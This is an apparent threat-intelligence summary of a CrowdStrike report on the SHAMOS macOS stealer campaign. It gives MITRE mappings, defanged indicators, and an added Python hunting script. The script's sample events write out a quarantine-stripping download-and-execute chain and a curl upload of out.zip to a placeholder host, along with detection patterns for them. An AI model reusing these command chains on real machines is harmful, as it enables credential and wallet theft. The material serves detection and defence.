Between June and August 2025, COOKIE SPIDER’s SHAMOS (an AMOS variant) was distributed via malvertising and malicious one-line installation commands to target macOS users across many countries, with CrowdStrike Falcon blocking attempts to compromise over 300 customer environments. The campaign used Base64-obfuscated URLs and Bash scripts to bypass Gatekeeper, capture credentials and wallets (including Keychain and AppleNotes), and exfiltrate data. #SHAMOS #COOKIE_SPIDER
Keypoints
- CrowdStrike Falcon blocked a campaign from June–August 2025 that attempted to compromise 300+ customer environments by distributing SHAMOS, an Atomic macOS Stealer (AMOS) variant developed by COOKIE SPIDER.
- Attackers used malvertising and spoofed help websites (e.g., mac-safer[.]com, rescue-mac[.]com) and malicious one-line Terminal commands to trick macOS users into executing installer Bash scripts.
- The one-line commands sometimes used Base64 encoding to hide the download URL and bypassed Gatekeeper by removing extended attributes and directly executing Mach-O binaries from /tmp/.
- SHAMOS performs anti-VM checks, runs AppleScript for host reconnaissance, searches for cryptocurrency wallet files and credential stores (Keychain, AppleNotes, browsers), and exfiltrates data via curl in an out.zip archive.
- SHAMOS downloads additional payloads (a spoofed Ledger Live and a botnet module), sets persistence via com.finder.helper.plist in LaunchDaemons (if sudo is available), and writes the downloaded executables to the victim’s home directory.
- Threat actors also abused GitHub repositories (e.g., github[.]com/jeryrymoore/Iterm2) to host fake installation instructions and deliver the same one-line command and Bash scripts (with macostutorial[.]com identified as a hosting domain).
- CrowdStrike recommends enabling suspicious process prevention and intelligence-sourced threat prevention and provides Falcon hunting queries to detect Bash scripts with dscl/curl/xattr/chmod, AppleScript execution from /tmp/, and curl POSTs sending out.zip.
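The three hunting patterns listed above (a Bash installer chaining curl with xattr/chmod on /tmp/ paths, osascript loading a script from /tmp/, and a curl upload of out.zip) can be expressed as simple detection logic over process telemetry. The script below is an added illustration, not CrowdStrike's code or Falcon query syntax; the event records are constructed and the hostnames are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample process events: (parent_pid, command_line).
# Shaped like EDR telemetry; the hosts are placeholders, not real indicators.
EVENTS = [
    (501, "curl -s -o /tmp/update https://example.invalid/gm/update"),
    (501, "xattr -c /tmp/update"),
    (501, "chmod +x /tmp/update"),
    (501, "dscl . -authonly admin <password>"),
    (502, "osascript /tmp/recon.scpt"),
    (503, "curl -X POST -F file=@/tmp/out.zip https://example.invalid/upload"),
    (700, "curl -s -o /tmp/pkg.tar https://example.invalid/pkg.tar"),  # benign
    (700, "chmod +x /usr/local/bin/pkgtool"),                            # benign
    (800, "chmod +x /tmp/build/run.sh"),                                 # benign
]

# Matches /tmp/ or /private/tmp/ (macOS resolves /tmp to /private/tmp).
TMP = re.compile(r"(?<![\w.-])(?:/private)?/tmp/")
# curl switches that turn a request into an upload.
POST_FLAGS = re.compile(r"(^|\s)(-X\s*POST|-F|--form|-d|--data\S*|-T|--upload-file)(\s|$)")

def installer_chains(events):
    """Parent PIDs under which curl and xattr/chmod both act on /tmp/ paths:
    download, strip the quarantine attribute, mark executable (dscl is noted
    because the installer script also uses it)."""
    tools_by_parent = defaultdict(set)
    for ppid, cmd in events:
        tool = cmd.split()[0]
        if tool in {"curl", "xattr", "chmod", "dscl"} and (tool == "dscl" or TMP.search(cmd)):
            tools_by_parent[ppid].add(tool)
    return sorted(p for p, t in tools_by_parent.items()
                  if "curl" in t and t & {"xattr", "chmod"})

def applescript_from_tmp(events):
    """osascript invocations that load their script from /tmp/."""
    return [cmd for _, cmd in events if cmd.split()[0] == "osascript" and TMP.search(cmd)]

def outzip_exfil(events):
    """curl uploads whose arguments reference the out.zip archive."""
    return [cmd for _, cmd in events
            if cmd.split()[0] == "curl" and POST_FLAGS.search(cmd) and "out.zip" in cmd]

def hunt(events):
    return {"installer_chains": installer_chains(events),
            "applescript_from_tmp": applescript_from_tmp(events),
            "outzip_exfil": outzip_exfil(events)}

if __name__ == "__main__":
    for name, hits in hunt(EVENTS).items():
        print(name, hits)
```

Parent 700 downloads to /tmp/ but never strips attributes or marks a /tmp/ file executable, and parent 800 only runs chmod, so neither is flagged; only the full chain under parent 501 is.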
MITRE Techniques
- [T1583.001] Acquire Infrastructure: Domains – The eCrime actor registered fake macOS help websites to host malicious instructions (e.g., “fake macOS help websites” used to host installer commands).
- [T1189] Drive-by Compromise – Malvertising promoted websites containing SHAMOS installation instructions and lured victims into executing the one-line install command (“promoted malvertising website… users were instructed to execute a malicious one-line installation command”).
- [T1204] User Execution – SHAMOS requires the user to copy, paste, and run the malicious installer command in Terminal to initiate infection (“Both malvertising websites instruct the victims to copy, paste, and execute the following command in Terminal”).
- [T1027.010] Obfuscated Files or Information: Command Obfuscation – The malicious command uses Base64 encoding to obfuscate the Bash script download URL (“the command decodes the Base64-encoded string… and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh”).
- [T1105] Ingress Tool Transfer – The Bash script and subsequent curl commands download SHAMOS and additional payloads from external URLs (“the Bash script… downloads a SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update” and “SHAMOS downloads additional malicious payloads… to the victim’s home directory”).
Indicators of Compromise
- [Domains] Malvertising and hosting – mac-safer[.]com, rescue-mac[.]com (fraudulent macOS help pages that provided malicious install commands).
- [Domains] GitHub and fake repos – github[.]com/jeryrymoore/Iterm2 (malicious repo masquerading as iTerm2 with fake install instructions).
- [URLs] Bash script hosts – https[:]//icloudservers[.]com/gm/install[.]sh, https[:]//macostutorial[.]com/iterm2/install[.]sh (hosts serving installer Bash scripts).
- [URLs] SHAMOS payload hosts – https[:]//icloudservers[.]com/gm/update, https[:]//macostutorial[.]com/iterm2/update (locations from which the SHAMOS Mach-O was downloaded).
- [File hashes] Bash script SHA256 – 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f, eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68
- [File hashes] SHAMOS Mach-O SHA256 – 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f, b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 (and 2 more hashes).
Read more: https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/